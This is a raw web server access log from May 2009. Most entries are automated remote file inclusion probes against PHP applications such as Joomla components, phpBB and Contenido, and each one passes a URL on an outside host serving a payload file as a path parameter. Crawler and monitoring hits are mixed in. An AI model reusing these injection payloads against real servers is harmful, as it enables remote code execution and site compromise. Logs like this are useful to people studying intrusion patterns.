195.34.78.110 - - [23/May/2009:03:59:17 -0400] "GET /logs/access_log.Q109050700/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:18 -0400] "GET /logs/access_log.Q108112400/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:19 -0400] "GET /logs/access_log.Q108112400/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:03:59:21 -0400] "GET /logs/access_log.Q108112400/include.php?phpbb_root_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.72.114 - - [23/May/2009:03:59:53 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
203.251.81.216 - - [23/May/2009:04:00:16 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:00:16 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:00:20 -0400] "GET /logs/error_log.Q108082300%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.94.155.59 - - [23/May/2009:04:00:34 -0400] "GET /logs/access_log.Q108110900%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:01:22 -0400] "GET /test.php?page=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:01:22 -0400] "GET /logs/access_log.Q109031800%20%20/test.php?page=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:01:22 -0400] "GET /logs/test.php?page=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
74.63.33.250 - - [23/May/2009:04:01:33 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.63.33.250 - - [23/May/2009:04:01:33 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.63.33.250 - - [23/May/2009:04:01:33 -0400] "GET /logs/access_log.Q109051200//include/print_category.php?setup[use_category]=1&dir=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [23/May/2009:04:02:16 -0400] "GET /logs/error_log.Q109013100%20%20/test.php?page=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.181.7.97 - - [23/May/2009:04:02:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [23/May/2009:04:02:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.233.22.209 - - [23/May/2009:04:02:42 -0400] "GET /index.php?option=com_custompages&cpage=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
123.125.64.38 - - [23/May/2009:04:02:59 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
80.55.171.90 - - [23/May/2009:04:03:03 -0400] "GET /logs/access_log.Q108120400%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 236 "-" "libwww-perl/5.821"
80.55.171.90 - - [23/May/2009:04:03:03 -0400] "GET /logs/access_log.Q108091400%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt?????? HTTP/1.1" 404 236 "-" "libwww-perl/5.821"
203.251.81.216 - - [23/May/2009:04:03:50 -0400] "GET /logs/access_log.Q109031500%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:04:03:56 -0400] "GET /logs/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:04:03:56 -0400] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.81.17.221 - - [23/May/2009:04:03:56 -0400] "GET /logs/access_log.Q109011600%20%20/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.0.54.98 - - [23/May/2009:04:05:31 -0400] "GET /logs/error_log.Q108122200//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
124.0.54.98 - - [23/May/2009:04:05:31 -0400] "GET //?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
124.0.54.98 - - [23/May/2009:04:05:32 -0400] "GET /logs//?_zb_path=http://chr.es.kr/02.txt?? HTTP/1.1" 200 2495 "-" "libwww-perl/5.803"
66.249.72.114 - - [23/May/2009:04:05:57 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3081C9431801D7004A6D043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.14.5.125 - - [23/May/2009:04:06:45 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
212.14.5.125 - - [23/May/2009:04:06:45 -0400] "GET /logs/access_log.Q108061500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
212.14.5.125 - - [23/May/2009:04:06:45 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:04:06:54 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:04:06:54 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:04:06:54 -0400] "GET /logs/access_log.Q108061500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:04:07:04 -0400] "GET /logs/access_log.Q108061500/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:04:07:05 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:04:07:05 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:06 -0400] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:06 -0400] "GET /logs/access_log.Q108121400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:06 -0400] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:07 -0400] "GET /logs/access_log.Q108121400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:07 -0400] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:08 -0400] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:10 -0400] "GET /logs/access_log.Q108072400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:07:12 -0400] "GET /logs/access_log.Q108072400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:04:07:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.210.42 - - [23/May/2009:04:08:17 -0400] "GET /logs/access_log.Q108061500%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:04:08:39 -0400] "GET /logs/access_log.Q108061500%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.30.142.171 - - [23/May/2009:04:08:41 -0400] "GET /images/_notes/download_RCM_info.jpg.mno HTTP/1.0" 200 260 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.32.100.130 - - [23/May/2009:04:09:12 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:09:12 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:09:12 -0400] "GET /logs/access_log.Q108110900//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:09:13 -0400] "GET /logs/access_log.Q108121400%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:09:13 -0400] "GET /logs/access_log.Q108072400%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:04:09:14 -0400] "GET /logs/access_log.Q108062800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:09:16 -0400] "GET /logs/access_log.Q108121400%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:09:16 -0400] "GET /logs/access_log.Q108072400%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:09:25 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:09:25 -0400] "GET /logs/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 2490 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:09:25 -0400] "GET /?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:09:31 -0400] "GET /logs/access_log.Q108091100/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.230.85.142 - - [23/May/2009:04:09:33 -0400] "GET /logs/access_log.Q108062800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
85.10.128.219 - - [23/May/2009:04:09:35 -0400] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.10.128.219 - - [23/May/2009:04:09:35 -0400] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.10.128.219 - - [23/May/2009:04:09:35 -0400] "GET /logs/access_log.Q108051700/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:09:41 -0400] "GET /logs/access_log.Q108110400//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
212.14.5.125 - - [23/May/2009:04:09:42 -0400] "GET /logs/access_log.Q108061500%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
212.14.5.125 - - [23/May/2009:04:10:27 -0400] "GET /logs/access_log.Q108062800%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
85.10.128.219 - - [23/May/2009:04:11:25 -0400] "GET /logs/access_log.Q108051700%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:04:12:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.11.230.36 - - [23/May/2009:04:12:53 -0400] "GET /logs/access_log.Q109050700/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.10.128.219 - - [23/May/2009:04:12:58 -0400] "GET /logs/access_log.Q109051200%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [23/May/2009:04:13:12 -0400] "GET /logs/access_log.Q108111500/includes/ktedit/toolbar.php?dirDepth=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:13:18 -0400] "GET /test.php?page=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:13:18 -0400] "GET /logs/access_log.Q109031800%20%20/test.php?page=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:13:22 -0400] "GET /logs/test.php?page=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
212.14.5.125 - - [23/May/2009:04:13:24 -0400] "GET /logs/access_log.Q108090100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/coreto3/1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
211.233.22.209 - - [23/May/2009:04:13:41 -0400] "GET /logs/access_log.Q108090100/index.php?option=com_custompages&cpage=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.233.22.209 - - [23/May/2009:04:13:41 -0400] "GET /logs/index.php?option=com_custompages&cpage=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
200.32.100.130 - - [23/May/2009:04:13:50 -0400] "GET /logs/access_log.Q108110900%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.233.22.209 - - [23/May/2009:04:13:57 -0400] "GET /logs/access_log.Q108111500/index.php?option=com_custompages&cpage=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.32.100.130 - - [23/May/2009:04:14:12 -0400] "GET /logs/access_log.Q108110400%20%20//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.115.89.68 - - [23/May/2009:04:14:24 -0400] "GET //com_joomlalib/standalone/stubjambo.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
211.115.89.68 - - [23/May/2009:04:14:24 -0400] "GET /logs/access_log.Q108073000//com_joomlalib/standalone/stubjambo.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
211.115.89.68 - - [23/May/2009:04:14:24 -0400] "GET /logs//com_joomlalib/standalone/stubjambo.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
88.80.198.13 - - [23/May/2009:04:14:44 -0400] "GET /errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
88.80.198.13 - - [23/May/2009:04:14:44 -0400] "GET /logs/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
88.80.198.13 - - [23/May/2009:04:14:49 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [23/May/2009:04:15:38 -0400] "GET /logs/access_log.Q108091400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
123.125.64.51 - - [23/May/2009:04:17:27 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [23/May/2009:04:17:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.89.68 - - [23/May/2009:04:17:33 -0400] "GET /logs/access_log.Q108073000%20%20//com_joomlalib/standalone/stubjambo.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
123.125.64.49 - - [23/May/2009:04:17:55 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.219.99.129 - - [23/May/2009:04:18:19 -0400] "GET /logs/access_log.Q109011800//login.php?dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.219.99.129 - - [23/May/2009:04:18:24 -0400] "GET //login.php?dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
66.219.99.129 - - [23/May/2009:04:18:24 -0400] "GET /logs//login.php?dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
87.230.85.142 - - [23/May/2009:04:18:41 -0400] "GET /logs/access_log.Q108090100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
88.191.103.144 - - [23/May/2009:04:19:17 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:19:17 -0400] "GET ///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.825"
88.191.103.144 - - [23/May/2009:04:19:17 -0400] "GET /logs///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.825"
211.115.89.68 - - [23/May/2009:04:19:45 -0400] "GET /logs/access_log.Q109051000//com_joomlalib/standalone/stubjambo.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
211.115.89.68 - - [23/May/2009:04:19:46 -0400] "GET /logs/access_log.Q109051200//com_joomlalib/standalone/stubjambo.php=http://siam2.com/picpost/picture/.../fx29id.txt?? HTTP/1.1" 404 312 "-" "Mozilla/5.0"
91.121.210.42 - - [23/May/2009:04:19:56 -0400] "GET /logs/access_log.Q108090100/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:04:20:45 -0400] "GET /show_news.php?cutepath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:04:20:45 -0400] "GET /logs/access_log.Q108112400/show_news.php?cutepath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.151.134.36 - - [23/May/2009:04:20:45 -0400] "GET /logs/show_news.php?cutepath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
88.80.198.13 - - [23/May/2009:04:21:10 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.32.100.130 - - [23/May/2009:04:21:20 -0400] "GET /logs/access_log.Q108090100//modules/agendax/addevent.inc.php?agendax_path=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
88.84.128.40 - - [23/May/2009:04:21:27 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
66.219.99.129 - - [23/May/2009:04:21:27 -0400] "GET /logs/access_log.Q109050300//login.php?dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
88.84.128.40 - - [23/May/2009:04:21:27 -0400] "GET ///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
88.84.128.40 - - [23/May/2009:04:21:28 -0400] "GET /logs///vwar/backup/errors.php?error=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
216.151.134.36 - - [23/May/2009:04:21:42 -0400] "GET /logs/access_log.Q108110900/show_news.php?cutepath=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
203.251.81.216 - - [23/May/2009:04:22:22 -0400] "GET /logs/error_log.Q109013100%20%20/test.php?page=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:04:22:23 -0400] "GET /main.php?x=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:04:22:23 -0400] "GET /logs/error_log.Q109051700/main.php?x=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [23/May/2009:04:22:23 -0400] "GET /logs/main.php?x=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.59.12.99 - - [23/May/2009:04:22:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.165.80.16 - - [23/May/2009:04:22:42 -0400] "GET /errors.php?error=http://www.jungle-productions.com/login/examples/safe2.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
72.30.142.171 - - [23/May/2009:04:23:27 -0400] "GET /logs/access_log.Q107122300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.104.47.218 - - [23/May/2009:04:23:55 -0400] "GET /logs/error_log.Q109012600%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:23:55 -0400] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:23:55 -0400] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.104.47.218 - - [23/May/2009:04:24:00 -0400] "GET /logs/access_log.Q109011800%20%20//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:24:33 -0400] "GET /?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.199.222.19 - - [23/May/2009:04:24:33 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
